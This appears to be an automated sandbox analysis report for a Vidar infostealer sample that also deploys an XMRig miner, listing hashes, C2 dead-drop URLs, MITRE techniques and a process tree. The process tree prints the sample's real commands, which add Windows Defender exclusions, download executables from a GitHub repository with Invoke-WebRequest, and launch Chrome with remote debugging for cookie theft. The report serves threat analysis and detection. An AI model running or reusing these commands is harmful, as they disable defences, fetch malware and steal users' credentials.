vidar | 98a355651f9f043e1ed3eaf1ac5ef8ff617f3438969e6488ef05ada40bac12d2

Analysis

max time kernel
149s
max time network
131s
platform
windows11-21h2_x64
resource
win11-20250410-en
resource tags

arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
submitted
20/04/2025, 13:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-04-20_656a1813b1f6b1b23f86868148f03c97_black-basta_cobalt-strike_satacom.exe
Size

349KB
MD5

656a1813b1f6b1b23f86868148f03c97
SHA1

171427be31c7cd18d2838e9c985240a77370c99c
SHA256

98a355651f9f043e1ed3eaf1ac5ef8ff617f3438969e6488ef05ada40bac12d2
SHA512

69444b0a88c3a46da193a4920546a371b9243cb8a925ae725dc33e964f2342fe554e6e7f163f5d7eb6eb2b57e8d40d26e7fb2ff0ebf6b086402b20b69d21b2a7
SSDEEP

6144:ZdCuJHaXn51HBOWGEI8ue6/W4yJIyhBzOTVa:ZwuJqnbBjGEIn/W4yOk1

Score

10^/10

vidar xmrig fe765de57643ac9d227ea7737a97bb87 credential_access defense_evasion discovery execution miner persistence spyware stealer upx

Malware Config

Extracted

Family

vidar

Version

13.5

Botnet

fe765de57643ac9d227ea7737a97bb87

https://t.me/v00rd

https://steamcommunity.com/profiles/76561199846773220

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Signatures

Detect Vidar Stealer 1 IoCs

stealer

resource	yara_rule
behavioral2/files/0x001c00000002b1d3-41.dat	family_vidar_v7

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral2/memory/1648-587-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/1648-586-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/1648-585-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/1648-588-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/1648-584-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/1648-582-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/1648-581-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/1648-598-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/1648-599-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig

Blocklisted process makes network request 6 IoCs

flow	pid	Process
2	3384	powershell.exe
3	3384	powershell.exe
6	4364	powershell.exe
8	4364	powershell.exe
13	772	powershell.exe
16	772	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4348	powershell.exe
2116	powershell.exe
1232	powershell.exe
3384	powershell.exe
4364	powershell.exe
772	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	whoci.exe
File created	C:\Windows\system32\drivers\etc\hosts	Updater.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 8 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
2380	chrome.exe
6028	chrome.exe
3268	chrome.exe
1928	chrome.exe
1524	chrome.exe
5424	msedge.exe
536	msedge.exe
2420	msedge.exe

Executes dropped EXE 5 IoCs

pid	Process
940	xcnthqwzzfcw.exe
4896	luytsb.exe
1440	whoci.exe
3012	Updater.exe
3040	service.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
8	raw.githubusercontent.com
16	raw.githubusercontent.com
89	pastebin.com
149	pastebin.com
1	raw.githubusercontent.com
3	raw.githubusercontent.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
4520	powercfg.exe
4048	powercfg.exe
2476	powercfg.exe
1944	powercfg.exe
4320	powercfg.exe
3116	powercfg.exe
3532	powercfg.exe
3324	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	whoci.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Updater.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3012 set thread context of 2932	3012	Updater.exe	167
PID 3012 set thread context of 1648	3012	Updater.exe	172

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1648-580-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1648-576-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1648-577-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1648-587-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1648-586-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1648-585-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1648-588-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1648-584-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1648-582-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1648-581-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1648-579-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1648-578-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1648-598-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/1648-599-0x0000000140000000-0x0000000140835000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4048	sc.exe
5972	sc.exe
2080	sc.exe
2560	sc.exe
4296	sc.exe
1072	sc.exe
5308	sc.exe
5232	sc.exe
3352	sc.exe
4608	sc.exe
2344	sc.exe
564	sc.exe
3024	sc.exe
3308	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcnthqwzzfcw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	luytsb.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	xcnthqwzzfcw.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	xcnthqwzzfcw.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
1340	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 52 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133896298371019156"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3996	schtasks.exe
608	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4348	powershell.exe
4348	powershell.exe
3384	powershell.exe
3384	powershell.exe
4364	powershell.exe
4364	powershell.exe
772	powershell.exe
772	powershell.exe
940	xcnthqwzzfcw.exe
940	xcnthqwzzfcw.exe
940	xcnthqwzzfcw.exe
940	xcnthqwzzfcw.exe
2380	chrome.exe
2380	chrome.exe
940	xcnthqwzzfcw.exe
940	xcnthqwzzfcw.exe
940	xcnthqwzzfcw.exe
940	xcnthqwzzfcw.exe
1440	whoci.exe
2116	powershell.exe
2116	powershell.exe
2116	powershell.exe
1440	whoci.exe
1440	whoci.exe
1440	whoci.exe
1440	whoci.exe
1440	whoci.exe
1440	whoci.exe
1440	whoci.exe
1440	whoci.exe
1440	whoci.exe
1440	whoci.exe
1440	whoci.exe
1440	whoci.exe
1440	whoci.exe
1440	whoci.exe
940	xcnthqwzzfcw.exe
940	xcnthqwzzfcw.exe
3012	Updater.exe
1232	powershell.exe
1232	powershell.exe
3012	Updater.exe
3012	Updater.exe
3012	Updater.exe
3012	Updater.exe
3012	Updater.exe
3012	Updater.exe
3012	Updater.exe
3012	Updater.exe
3012	Updater.exe
3012	Updater.exe
3012	Updater.exe
3012	Updater.exe
1648	explorer.exe
1648	explorer.exe
1648	explorer.exe
1648	explorer.exe
940	xcnthqwzzfcw.exe
940	xcnthqwzzfcw.exe
1648	explorer.exe
1648	explorer.exe
1648	explorer.exe
1648	explorer.exe
1648	explorer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
5424	msedge.exe
5424	msedge.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeDebugPrivilege	4348	powershell.exe
Token: SeDebugPrivilege	3384	powershell.exe
Token: SeDebugPrivilege	4364	powershell.exe
Token: SeDebugPrivilege	772	powershell.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeDebugPrivilege	2116	powershell.exe
Token: SeShutdownPrivilege	1944	powercfg.exe
Token: SeCreatePagefilePrivilege	1944	powercfg.exe
Token: SeShutdownPrivilege	3116	powercfg.exe
Token: SeCreatePagefilePrivilege	3116	powercfg.exe
Token: SeShutdownPrivilege	3532	powercfg.exe
Token: SeCreatePagefilePrivilege	3532	powercfg.exe
Token: SeShutdownPrivilege	4320	powercfg.exe
Token: SeCreatePagefilePrivilege	4320	powercfg.exe
Token: SeDebugPrivilege	1232	powershell.exe
Token: SeShutdownPrivilege	3324	powercfg.exe
Token: SeCreatePagefilePrivilege	3324	powercfg.exe
Token: SeShutdownPrivilege	4048	powercfg.exe
Token: SeCreatePagefilePrivilege	4048	powercfg.exe
Token: SeLockMemoryPrivilege	1648	explorer.exe
Token: SeShutdownPrivilege	4520	powercfg.exe
Token: SeCreatePagefilePrivilege	4520	powercfg.exe
Token: SeShutdownPrivilege	2476	powercfg.exe
Token: SeCreatePagefilePrivilege	2476	powercfg.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
5424	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3764 wrote to memory of 1336	3764	2025-04-20_656a1813b1f6b1b23f86868148f03c97_black-basta_cobalt-strike_satacom.exe	79
PID 3764 wrote to memory of 1336	3764	2025-04-20_656a1813b1f6b1b23f86868148f03c97_black-basta_cobalt-strike_satacom.exe	79
PID 1336 wrote to memory of 4348	1336	cmd.exe	80
PID 1336 wrote to memory of 4348	1336	cmd.exe	80
PID 3764 wrote to memory of 712	3764	2025-04-20_656a1813b1f6b1b23f86868148f03c97_black-basta_cobalt-strike_satacom.exe	81
PID 3764 wrote to memory of 712	3764	2025-04-20_656a1813b1f6b1b23f86868148f03c97_black-basta_cobalt-strike_satacom.exe	81
PID 712 wrote to memory of 3384	712	cmd.exe	82
PID 712 wrote to memory of 3384	712	cmd.exe	82
PID 3764 wrote to memory of 3284	3764	2025-04-20_656a1813b1f6b1b23f86868148f03c97_black-basta_cobalt-strike_satacom.exe	83
PID 3764 wrote to memory of 3284	3764	2025-04-20_656a1813b1f6b1b23f86868148f03c97_black-basta_cobalt-strike_satacom.exe	83
PID 3284 wrote to memory of 4364	3284	cmd.exe	84
PID 3284 wrote to memory of 4364	3284	cmd.exe	84
PID 3764 wrote to memory of 940	3764	2025-04-20_656a1813b1f6b1b23f86868148f03c97_black-basta_cobalt-strike_satacom.exe	85
PID 3764 wrote to memory of 940	3764	2025-04-20_656a1813b1f6b1b23f86868148f03c97_black-basta_cobalt-strike_satacom.exe	85
PID 3764 wrote to memory of 940	3764	2025-04-20_656a1813b1f6b1b23f86868148f03c97_black-basta_cobalt-strike_satacom.exe	85
PID 3764 wrote to memory of 5072	3764	2025-04-20_656a1813b1f6b1b23f86868148f03c97_black-basta_cobalt-strike_satacom.exe	86
PID 3764 wrote to memory of 5072	3764	2025-04-20_656a1813b1f6b1b23f86868148f03c97_black-basta_cobalt-strike_satacom.exe	86
PID 3764 wrote to memory of 4896	3764	2025-04-20_656a1813b1f6b1b23f86868148f03c97_black-basta_cobalt-strike_satacom.exe	87
PID 3764 wrote to memory of 4896	3764	2025-04-20_656a1813b1f6b1b23f86868148f03c97_black-basta_cobalt-strike_satacom.exe	87
PID 3764 wrote to memory of 4896	3764	2025-04-20_656a1813b1f6b1b23f86868148f03c97_black-basta_cobalt-strike_satacom.exe	87
PID 5072 wrote to memory of 772	5072	cmd.exe	88
PID 5072 wrote to memory of 772	5072	cmd.exe	88
PID 4896 wrote to memory of 1060	4896	luytsb.exe	89
PID 4896 wrote to memory of 1060	4896	luytsb.exe	89
PID 4896 wrote to memory of 1060	4896	luytsb.exe	89
PID 1060 wrote to memory of 3996	1060	cmd.exe	91
PID 1060 wrote to memory of 3996	1060	cmd.exe	91
PID 1060 wrote to memory of 3996	1060	cmd.exe	91
PID 940 wrote to memory of 2380	940	xcnthqwzzfcw.exe	92
PID 940 wrote to memory of 2380	940	xcnthqwzzfcw.exe	92
PID 2380 wrote to memory of 2096	2380	chrome.exe	93
PID 2380 wrote to memory of 2096	2380	chrome.exe	93
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 1432	2380	chrome.exe	94
PID 2380 wrote to memory of 2084	2380	chrome.exe	95
PID 2380 wrote to memory of 2084	2380	chrome.exe	95

C:\Users\Admin\AppData\Local\Temp\2025-04-20_656a1813b1f6b1b23f86868148f03c97_black-basta_cobalt-strike_satacom.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-20_656a1813b1f6b1b23f86868148f03c97_black-basta_cobalt-strike_satacom.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\gjjvqffs', 'C:\Users', 'C:\ProgramData'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\gjjvqffs', 'C:\Users', 'C:\ProgramData'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\gjjvqffs\xcnthqwzzfcw.exe'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\gjjvqffs\xcnthqwzzfcw.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\gjjvqffs\luytsb.exe'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3284
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\gjjvqffs\luytsb.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4364
- C:\Users\Admin\AppData\Local\gjjvqffs\xcnthqwzzfcw.exe
  "C:\Users\Admin\AppData\Local\gjjvqffs\xcnthqwzzfcw.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:940
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Drops file in Windows directory
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2380
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
